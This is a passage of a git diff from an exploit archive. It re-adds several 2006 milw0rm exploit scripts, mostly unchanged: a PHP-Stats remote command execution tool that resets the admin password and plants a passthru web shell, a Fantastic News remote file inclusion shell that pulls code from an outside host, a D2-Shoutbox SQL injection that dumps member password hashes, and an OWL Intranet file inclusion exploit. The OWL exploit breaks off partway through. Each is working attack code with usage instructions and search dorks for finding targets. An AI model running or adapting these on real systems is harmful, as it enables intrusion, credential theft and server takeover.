-    $packet.="Connection: Close\r\n\r\n";
-    show($packet);
-    sendpacketii($packet);
-}
-else
-{echo "Fill * required fields, optionally specify a proxy...";}
-echo "";
-?>
-
-# milw0rm.com [2006-03-04]
+ works regardless of magic_quotes_gpc settings...                         #
+#  usage: launch from Apache, fill in requested fields, then go!               #
+#                                                                              #
+#  Sun-Tzu:"Of old, the rise of the Yin dynasty was due to I Chih who had      #
+#  served under the Hsia.  Likewise, the rise of the Chou dynasty was due to   #
+#  Lu Ya who had served under the Yin."                                        #
+
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+ob_implicit_flush (1);
+
+echo'***** PHP-Stats <= 0.1.9.1 remote commands execution****
+
+

+***** PHP-Stats <= 0.1.9.1 remote commands execution**** 
a
+script  by  rgod  at    
+http://retrogod.altervista.org

+

+
    
 * target    (ex:www.sitename.com)
+
 
  * path (ex:
+/stats/ or just / ) 
           * specify a command ("cat config.php" to see database username  &
+password...)

+specify  a  port other than  80 (default value) 
send  exploit through an HTTP proxy  (ip:port)
+
 
 
 
';
+
+function show($headeri)
+{
+  $ii=0;$ji=0;$ki=0;$ci=0;
+  echo '';
+  while ($ii <= strlen($headeri)-1){
+    $datai=dechex(ord($headeri[$ii]));
+    if ($ji==16) {
+      $ji=0;
+      $ci++;
+      echo "";
+      for ($li=0; $li<=15; $li++) {
+        echo "";
+		}
+      $ki=$ki+16;
+      echo "";
+    }
+    if (strlen($datai)==1) {
+      echo "";
+    }
+    else {
+      echo " ";
+    }
+    $ii++;$ji++;
+  }
+  for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {
+    echo "";
+  }
+  for ($li=$ci*16; $li<=strlen($headeri); $li++) {
+    echo "";
+  }
+  echo "
  ".htmlentities($headeri[$li+$ki])."
0".htmlentities($datai)."".htmlentities($datai)."  ".htmlentities($headeri[$li])."
";
+}
+
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+
+function sendpacket() //2x speed
+{
+  global $proxy, $host, $port, $packet, $html, $proxy_regex;
+  $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
+  if ($socket < 0) {
+    echo "socket_create() failed: reason: " . socket_strerror($socket) . "
";
+  }
+  else {
+    $c = preg_match($proxy_regex,$proxy);
+    if (!$c) {echo 'Not a valid proxy...';
+    die;
+    }
+  echo "OK.
";
+  echo "Attempting to connect to ".$host." on port ".$port."...
";
+  if ($proxy=='') {
+    $result = socket_connect($socket, $host, $port);
+  }
+  else {
+    $parts =explode(':',$proxy);
+    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
';
+    $result = socket_connect($socket, $parts[0],$parts[1]);
+  }
+  if ($result < 0) {
+    echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "

";
+  }
+  else {
+    echo "OK.

";
+    $html= '';
+    socket_write($socket, $packet, strlen($packet));
+    echo "Reading response:
";
+    while ($out= socket_read($socket, 2048)) {$html.=$out;}
+    echo nl2br(htmlentities($html));
+    echo "Closing socket...";
+    socket_close($socket);
+  }
+  }
+}
+
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.htmlentities($host); die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid prozy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
';
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);echo nl2br(htmlentities($html));
+}
+
+if ( get_magic_quotes_gpc() ) {
+   function stripslashes_deep($value) {
+       $value = is_array($value) ? array_map('stripslashes_deep', $value) : stripslashes($value);
+       return $value;
+   }
+   $_POST = stripslashes_deep($_POST);
+}
+
+$host=$_POST[host];$port=$_POST[port];$path=$_POST[path];
+$cmd=$_POST[cmd];$cmd=urlencode($cmd);$proxy=$_POST[proxy];
+echo "";
+
+if (($host<>'') and ($path<>'') and ($cmd<>''))
+{
+    $port=intval(trim($port));
+    if ($port=='') {$port=80;}
+    if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+    if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+    $host=str_replace("\r","",$host);$host=str_replace("\n","",$host);
+    $path=str_replace("\r","",$path);$path=str_replace("\n","",$path);
+
+    $SHELL =';if (isset($_GET[cmd])){if (get_magic_quotes_gpc()){';
+    $SHELL.='$_GET[cmd] = stripslashes($_GET[cmd]);';
+    $SHELL.='}passthru($_GET[cmd]);}//';
+    #exploit... overwrite option[] array
+    #set a new admin password at run-time :)
+    #*****************************************
+    $data ="option=";
+    $data.="&option[admin_pass]=suntzu";
+    #****************************************
+    $data.="&option_new[callviaimg]=1";
+    $data.="&option_new[php_stats_safe]=0";
+    $data.="&option_new[out_compress]=1";
+    $data.="&option_new[persistent_conn]=0";
+    $data.="&option_new[autorefresh]=3";
+    $data.="&option_new[show_server_details]=1";
+    $data.="&option_new[show_average_user]=0";
+    $data.="&option_new[short_url]=1";
+    $data.="&option_new[lock_not_valid_url]=0";
+    $data.="&option_new[ext_whois]=";
+    $data.="&option_new[online_timeout]=5";
+    $data.="&option_new[page_title]=";
+    $data.="&option_new[online_timeout]=5";
+    $data.="&option_new[page_title]=1";
+    $data.="&option_new[log_host]=0";
+    $data.="&option_new[clear_cache]=0";
+    $data.="&option_new[full_recn]=0";
+    $data.="&option_new[logerrors]=1";
+    $data.="&option_new[check_new_version]=1";
+    $data.="&option_new[www_trunc]=0";
+    $data.="&option_new[accept_ssi]=1";
+    # inject some code in compatibility_mode argument...
+    # you can use all values, they should be numeric
+    # but they are not checked
+    # and not delimited by quotes in config.php
+    # so it works regardless of magic_quotes_gpc ...
+    $data.="&option_new[compatibility_mode]=0".$SHELL;
+    $data.="&option_new[ip-zone]=0";
+    $data.="&option_new[down_mode]=0";
+    $data.="&option_new[check_links]=1";
+    $data.="&mode=modify";
+    $packet ="POST ".$p."admin.php?action=modify_config HTTP/1.1\r\n";
+    $packet.="User-Agent: John Constantine\r\n";
+    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+    #******** the magic cookie ****************
+    $packet.="Cookie: php_stats_cache=1; pass_cookie=".md5("suntzu").";\r\n";
+    #******************************************
+    $packet.="Host: ".$host."\r\n";
+    $packet.="Content-Length: ".strlen($data)."\r\n";
+    $packet.="Connection: Close\r\n\r\n";
+    $packet.=$data;
+    show($packet);
+    sendpacketii($packet);
+
+    $packet ="GET ".$p."config.php?cmd=".$cmd." HTTP/1.1\r\n";
+    $packet.="User-Agent: URLBlaze\r\n";
+    $packet.="Host: ".$host."\r\n";
+    $packet.="Connection: Close\r\n\r\n";
+    show($packet);
+    sendpacketii($packet);
+}
+else
+{echo "Fill * required fields, optionally specify a proxy...";}
+echo "";
+?>
+
+# milw0rm.com [2006-03-04]
diff --git a/platforms/php/webapps/1553.pl b/platforms/php/webapps/1553.pl
index 59eff883a..400bea024 100755
--- a/platforms/php/webapps/1553.pl
+++ b/platforms/php/webapps/1553.pl
@@ -1,84 +1,84 @@
-#!/usr/bin/perl
-##
-# Fantastic News v2.1.2 (and possibly below) Remote Command Execution 
-# Bug Found By uid0 Exploit Coded by Zod
-## 
-# (c) 2006
-# ExploiterCode.com
-##
-# usage:
-# perl FNews.pl  
-#
-# perl FNews.pl http://site.com/FNews/ http://site.com/cmd.txt cmd
-#
-# cmd shell example: 
-#
-# cmd shell variable: ($_GET[cmd]);
-##
-# hai to: zodiac, nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, and everyone else!
-##
-# Contact: www.exploitercode.com irc.exploitercode.com
-##
-
-use LWP::UserAgent;
-
-$Path = $ARGV[0];
-$Pathtocmd = $ARGV[1];
-$cmdv = $ARGV[2];
-
-if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
-
-head();
-
-while()
-{
-	print "[shell] \$";
-while()
-        {
-                $cmd=$_;
-                chomp($cmd);
-         
-$xpl = LWP::UserAgent->new() or die;
-$req = HTTP::Request->new(GET =>$Path.'archive.php?CONFIG[script_path]='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
-
-$res = $xpl->request($req);
-$return = $res->content;
-$return =~ tr/[\n]/[ê]/;
-
-if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
-
-elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /)
-	{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
-elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
-
-if($return =~ /(.+).Fatal.error/)
-{
-	$finreturn = $1;
-	$finreturn=~ tr/[ê]/[\n]/;
-	print "\r\n$finreturn\n\r";
-	last;
-}
-
-else {print "[shell] \$";}}}last;
-
-sub head()
- {
- print "\n============================================================================\r\n";
- print " * Fantastic News v2.1.2 Remote Command Execution by ExploiterCode.com *\r\n";   
- print "============================================================================\r\n";
- }
-sub usage()
- {
- head();
- print " Usage: FNews.pl   \r\n\n";
- print "  - Full path to M - Phorum e.g. http://www.site.com/FNews/ \r\n";
- print "  - Path to Cmd Shell e.g http://www.site.com/cmd.txt \r\n";
- print "  - Command variable used in php shell \r\n";
- print "============================================================================\r\n";
- print "		  -=Coded by Zod, Bug Found by uid0=-\r\n";
- print "	www.exploitercode.com irc.exploitercode.com #exploitercode\r\n";
- print "============================================================================\r\n";
- exit();
- }
-
-# milw0rm.com [2006-03-04]
+#!/usr/bin/perl
+##
+# Fantastic News v2.1.2 (and possibly below) Remote Command Execution 
+# Bug Found By uid0 Exploit Coded by Zod
+## 
+# (c) 2006
+# ExploiterCode.com
+##
+# usage:
+# perl FNews.pl  
+#
+# perl FNews.pl http://site.com/FNews/ http://site.com/cmd.txt cmd
+#
+# cmd shell example: 
+#
+# cmd shell variable: ($_GET[cmd]);
+##
+# hai to: zodiac, nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, and everyone else!
+##
+# Contact: www.exploitercode.com irc.exploitercode.com
+##
+
+use LWP::UserAgent;
+
+$Path = $ARGV[0];
+$Pathtocmd = $ARGV[1];
+$cmdv = $ARGV[2];
+
+if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
+
+head();
+
+while()
+{
+	print "[shell] \$";
+while()
+        {
+                $cmd=$_;
+                chomp($cmd);
+         
+$xpl = LWP::UserAgent->new() or die;
+$req = HTTP::Request->new(GET =>$Path.'archive.php?CONFIG[script_path]='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
+
+$res = $xpl->request($req);
+$return = $res->content;
+$return =~ tr/[\n]/[ê]/;
+
+if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
+
+elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /)
+	{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
+elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
+
+if($return =~ /(.+).Fatal.error/)
+{
+	$finreturn = $1;
+	$finreturn=~ tr/[ê]/[\n]/;
+	print "\r\n$finreturn\n\r";
+	last;
+}
+
+else {print "[shell] \$";}}}last;
+
+sub head()
+ {
+ print "\n============================================================================\r\n";
+ print " * Fantastic News v2.1.2 Remote Command Execution by ExploiterCode.com *\r\n";   
+ print "============================================================================\r\n";
+ }
+sub usage()
+ {
+ head();
+ print " Usage: FNews.pl   \r\n\n";
+ print "  - Full path to M - Phorum e.g. http://www.site.com/FNews/ \r\n";
+ print "  - Path to Cmd Shell e.g http://www.site.com/cmd.txt \r\n";
+ print "  - Command variable used in php shell \r\n";
+ print "============================================================================\r\n";
+ print "		  -=Coded by Zod, Bug Found by uid0=-\r\n";
+ print "	www.exploitercode.com irc.exploitercode.com #exploitercode\r\n";
+ print "============================================================================\r\n";
+ exit();
+ }
+
+# milw0rm.com [2006-03-04]
diff --git a/platforms/php/webapps/1556.pl b/platforms/php/webapps/1556.pl
index 2858af2ca..8b172d3a0 100755
--- a/platforms/php/webapps/1556.pl
+++ b/platforms/php/webapps/1556.pl
@@ -1,68 +1,68 @@
-#!/usr/bin/perl
-#########################################################
-#		 _______ _______ ______ 		#
-#		 |______ |______ |     \		#
-#		 ______| |______ |_____/		#
-#		                        		#
-#D2-Shoutbox 4.2(IPB Mod)<=SQL injection		#
-#Created By SkOd                                        #
-#SED security Team                                      #
-#http://www.sed-team.be                                 #
-#skod.uk@gmail.com                                      #
-#ISRAEL                                                 #
-#########################################################
-#google:
-#"Powered By D2-Shoutbox 4.2"
-#########################################################
-use IO::Socket;
-$host = $ARGV[0];
-$user = $ARGV[2];
-$uid  = $ARGV[3];
-$pid  = $ARGV[4];
-$type = $ARGV[5];
-
-sub type()
-{
-if($type==1){$row="password";}
-if($type==2){$row="member_login_key";}
-else{print "Just 1 Or 2\n";exit();}
-$sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.",null,null,null%20FROM%20ibf_members%20where%20id=".$user."/*";
-$path = $ARGV[1].$sql;
-}
-
-
-sub header()
-{
-print q{
-#######################################################################
-###		 D2-Shoutbox 4.2 SQL injection Exploit 	    	    ### 
-###		 Tested On D2-Shoutbox 4.2 And IPB 2.4 	    	    ###
-###		  Created By SkOd, Sed Security Team 	    	    ###
-#######################################################################
-sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)]
-sedSB.pl www.host.com /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2
-#######################################################################
-}
-}
-
-sub sedsock()
-{
-$sedsock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "80") || die "[-]Connect Failed\r\n";
-print $sedsock "GET $path HTTP/1.1\n";
-print $sedsock "Host: $host\n";
-print $sedsock "Accept: */*\n";
-print $sedsock "Cookie: member_id=$uid; pass_hash=$pid\n";
-print $sedsock "Connection: close\n\n";
-while($res = <$sedsock>){
-$res =~ m/shout_s'>(.*?)<\/textarea>/ && print "[+]User: $user\n[+]Md5 Hash: $1\n";
-}
-}
-
-if(@ARGV < 6){
-header();
-}else{
-type();
-sedsock();
-}
-
-# milw0rm.com [2006-03-06]
+#!/usr/bin/perl
+#########################################################
+#		 _______ _______ ______ 		#
+#		 |______ |______ |     \		#
+#		 ______| |______ |_____/		#
+#		                        		#
+#D2-Shoutbox 4.2(IPB Mod)<=SQL injection		#
+#Created By SkOd                                        #
+#SED security Team                                      #
+#http://www.sed-team.be                                 #
+#skod.uk@gmail.com                                      #
+#ISRAEL                                                 #
+#########################################################
+#google:
+#"Powered By D2-Shoutbox 4.2"
+#########################################################
+use IO::Socket;
+$host = $ARGV[0];
+$user = $ARGV[2];
+$uid  = $ARGV[3];
+$pid  = $ARGV[4];
+$type = $ARGV[5];
+
+sub type()
+{
+if($type==1){$row="password";}
+if($type==2){$row="member_login_key";}
+else{print "Just 1 Or 2\n";exit();}
+$sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.",null,null,null%20FROM%20ibf_members%20where%20id=".$user."/*";
+$path = $ARGV[1].$sql;
+}
+
+
+sub header()
+{
+print q{
+#######################################################################
+###		 D2-Shoutbox 4.2 SQL injection Exploit 	    	    ### 
+###		 Tested On D2-Shoutbox 4.2 And IPB 2.4 	    	    ###
+###		  Created By SkOd, Sed Security Team 	    	    ###
+#######################################################################
+sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)]
+sedSB.pl www.host.com /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2
+#######################################################################
+}
+}
+
+sub sedsock()
+{
+$sedsock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "80") || die "[-]Connect Failed\r\n";
+print $sedsock "GET $path HTTP/1.1\n";
+print $sedsock "Host: $host\n";
+print $sedsock "Accept: */*\n";
+print $sedsock "Cookie: member_id=$uid; pass_hash=$pid\n";
+print $sedsock "Connection: close\n\n";
+while($res = <$sedsock>){
+$res =~ m/shout_s'>(.*?)<\/textarea>/ && print "[+]User: $user\n[+]Md5 Hash: $1\n";
+}
+}
+
+if(@ARGV < 6){
+header();
+}else{
+type();
+sedsock();
+}
+
+# milw0rm.com [2006-03-06]
diff --git a/platforms/php/webapps/1561.pl b/platforms/php/webapps/1561.pl
index 6e36ccb5d..fb1f6471d 100755
--- a/platforms/php/webapps/1561.pl
+++ b/platforms/php/webapps/1561.pl
@@ -1,83 +1,83 @@
-#!/usr/bin/perl
-use IO::Socket;
-print "WwwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
-print "WWwoLWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
-print "WWWWw**wWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
-print "WWWWWWWo°*òWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
-print "WWWWWWWWWwo° *òwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
-print "WWWWWWWWWWWWWò°  °°*òwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
-print "WWWWWWWWWWWWWWWWwo°      °°*oòwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
-print "WWWWWWWWWWWWWWWWWWWWWwò*°        °*òwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
-print "WWWWWWWWWWWWWWWWWWWWWWWWWWWwò*°       °òWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
-print "WWWWWWWWWWWWWWWWWWWWWWwwwLLwwwWWwo°      oWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
-print "WWWWWWWWWWWWWWWWL*°              °*o°     °wWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
-print "WWWWWWWWWWWWWW*     °*òwwwwwwò*             WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
-print "WWWWWWWWWWWWo     °Lwwwwwwwwwwwwò           °WWWWWWwwwwwWWWWWWwwwwwwwwwwwwwWWWWWWWWWW\r\n";
-print "WWWWWWWWWWWò     *wwwwwwwwwwwwwwww°          wWWWW*     *WWWWw             oWWWWWWWWW\r\n";
-print "WWWWWWWWWWW°    °wwwwwò°   °*wwwwww          °WWWw       wWWW°      w      oWWWWWWWWW\r\n";
-print "WWWWWWWWWWW     owwww*     °* owwww°          wWW*       °WWw      oW      oWWWWWWWWW\r\n";
-print "WWWWWWWWWWW     °wwww       * °wwww           *Ww    o    wW*     *WW      oWWWWWWWWW\r\n";
-print "WWWWWWWWWWWo     owww°        owww°     o      w*   °W°   °w      wWW      oWWWWWWWWW\r\n";
-print "WWWWWWWWWWWW*     *wwwo°    °òwww°     oWo     °    wWL    °     òWWW      *wwwwwwwww\r\n";
-print "WWWWWWWWWWWWWL°     °òwwwwwwwwo°     *wWWW°        *WWW°        °WWWW\r\n";
-print "WWWWWWWWWWWWWWWwo°      °°°      °*LWWWWWWW        wWWWL       °WWWWW\r\n";
-print "WWWWWWWWWWWWWWWWWWWWwwwwLLLwwwwWWWWWWWWWWWWo      *WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
-print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW°     wWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
-print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWw    *WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
-print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWo   wWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
-print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW° *WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
-print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWw°WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n\r\n";
-print "  OWL Intranet Engine  0.82 \"xrms_file_root\" cmmnds xctn xploit\r\n";
-print "     -> works with register_globals = On & allow_url_fopen = On    \r\n";
-print "              by rgod rgodautisticiorg                    \r\n";
-print "             site: http://retrogod.altervista.org              \r\n\r\n";
-print "Sun-Tzu: \"But a kingdom that has once been destroyed can never come\r\n";
-print "again into being; nor can the dead ever be brought back to life\"\r\n\r\n";
-print "\r\n dork: intitle:\"owl intranet * owl\" 0.82\r\n";
-sub main::urlEncode {
-    my ($string) = @_;
-    $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
-    #$string# =~ tr/.//;
-    return $string;
- }
-
-$serv=$ARGV[0];
-$path=$ARGV[1];
-$loc=urlEncode($ARGV[2]);
-$cmd=""; for ($i=3; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};
-
-if (@ARGV < 4)
-{
-print "\r\nUsage:\r\n";
-print "perl owl_082_xpl.pl SERVER PATH LOCATION COMMAND\r\n\r\n";
-print "SERVER         - Server where OWL is installed.\r\n";
-print "PATH           - Path to OWL (ex: /owl/ or just /) \r\n";
-print "LOCATION       - a site with the code to include (without ending slash)\r\n";
-print "COMMAND        - a Unix command\r\n\r\n";
-print "Example:\r\n";
-print "perl owl_xpl.pl localhost /owl/ http://192.168.1.3 ls -la\r\n";
-print "perl owl_xpl.pl localhost /owl/ http://192.168.1.3 cat ./../config/owl.php\r\n\r\n";
-print "note: on http location you need this code in /include-locations.inc/index.html :\r\n\r\n";
-
-print "\r\n";
-exit();
-}
-  $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout  => 10, PeerPort=>"http(80)")
-  or die "[+] Connecting ... Could not connect to host.\n\n";
-  print $sock "GET ".$path."lib/OWL_API.php?cmd=".$cmd."&xrms_file_root=".$loc." HTTP/1.1\r\n";
-  print $sock "User-Agent: Y!TunnelPro\r\n";
-  print $sock "Host: ".$serv."\r\n";
-  print $sock "Connection: close\r\n\r\n";
-
-  while ($answer = <$sock>) {
-    print $answer;
-  }
-  close($sock);
-
-# milw0rm.com [2006-03-07]
+#!/usr/bin/perl
+use IO::Socket;
+print "WwwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
+print "WWwoLWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
+print "WWWWw**wWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
+print "WWWWWWWo°*òWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
+print "WWWWWWWWWwo° *òwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
+print "WWWWWWWWWWWWWò°  °°*òwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
+print "WWWWWWWWWWWWWWWWwo°      °°*oòwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
+print "WWWWWWWWWWWWWWWWWWWWWwò*°        °*òwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
+print "WWWWWWWWWWWWWWWWWWWWWWWWWWWwò*°       °òWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
+print "WWWWWWWWWWWWWWWWWWWWWWwwwLLwwwWWwo°      oWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
+print "WWWWWWWWWWWWWWWWL*°              °*o°     °wWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
+print "WWWWWWWWWWWWWW*     °*òwwwwwwò*             WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
+print "WWWWWWWWWWWWo     °Lwwwwwwwwwwwwò           °WWWWWWwwwwwWWWWWWwwwwwwwwwwwwwWWWWWWWWWW\r\n";
+print "WWWWWWWWWWWò     *wwwwwwwwwwwwwwww°          wWWWW*     *WWWWw             oWWWWWWWWW\r\n";
+print "WWWWWWWWWWW°    °wwwwwò°   °*wwwwww          °WWWw       wWWW°      w      oWWWWWWWWW\r\n";
+print "WWWWWWWWWWW     owwww*     °* owwww°          wWW*       °WWw      oW      oWWWWWWWWW\r\n";
+print "WWWWWWWWWWW     °wwww       * °wwww           *Ww    o    wW*     *WW      oWWWWWWWWW\r\n";
+print "WWWWWWWWWWWo     owww°        owww°     o      w*   °W°   °w      wWW      oWWWWWWWWW\r\n";
+print "WWWWWWWWWWWW*     *wwwo°    °òwww°     oWo     °    wWL    °     òWWW      *wwwwwwwww\r\n";
+print "WWWWWWWWWWWWWL°     °òwwwwwwwwo°     *wWWW°        *WWW°        °WWWW\r\n";
+print "WWWWWWWWWWWWWWWwo°      °°°      °*LWWWWWWW        wWWWL       °WWWWW\r\n";
+print "WWWWWWWWWWWWWWWWWWWWwwwwLLLwwwwWWWWWWWWWWWWo      *WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
+print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW°     wWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
+print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWw    *WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
+print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWo   wWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
+print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW° *WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n";
+print "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWw°WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n\r\n";
+print "  OWL Intranet Engine  0.82 \"xrms_file_root\" cmmnds xctn xploit\r\n";
+print "     -> works with register_globals = On & allow_url_fopen = On    \r\n";
+print "              by rgod rgodautisticiorg                    \r\n";
+print "             site: http://retrogod.altervista.org              \r\n\r\n";
+print "Sun-Tzu: \"But a kingdom that has once been destroyed can never come\r\n";
+print "again into being; nor can the dead ever be brought back to life\"\r\n\r\n";
+print "\r\n dork: intitle:\"owl intranet * owl\" 0.82\r\n";
+sub main::urlEncode {
+    my ($string) = @_;
+    $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
+    #$string# =~ tr/.//;
+    return $string;
+ }
+
+$serv=$ARGV[0];
+$path=$ARGV[1];
+$loc=urlEncode($ARGV[2]);
+$cmd=""; for ($i=3; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};
+
+if (@ARGV < 4)
+{
+print "\r\nUsage:\r\n";
+print "perl owl_082_xpl.pl SERVER PATH LOCATION COMMAND\r\n\r\n";
+print "SERVER         - Server where OWL is installed.\r\n";
+print "PATH           - Path to OWL (ex: /owl/ or just /) \r\n";
+print "LOCATION       - a site with the code to include (without ending slash)\r\n";
+print "COMMAND        - a Unix command\r\n\r\n";
+print "Example:\r\n";
+print "perl owl_xpl.pl localhost /owl/ http://192.168.1.3 ls -la\r\n";
+print "perl owl_xpl.pl localhost /owl/ http://192.168.1.3 cat ./../config/owl.php\r\n\r\n";
+print "note: on http location you need this code in /include-locations.inc/index.html :\r\n\r\n";
+
+print "\r\n";
+exit();
+}
+  $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout  => 10, PeerPort=>"http(80)")
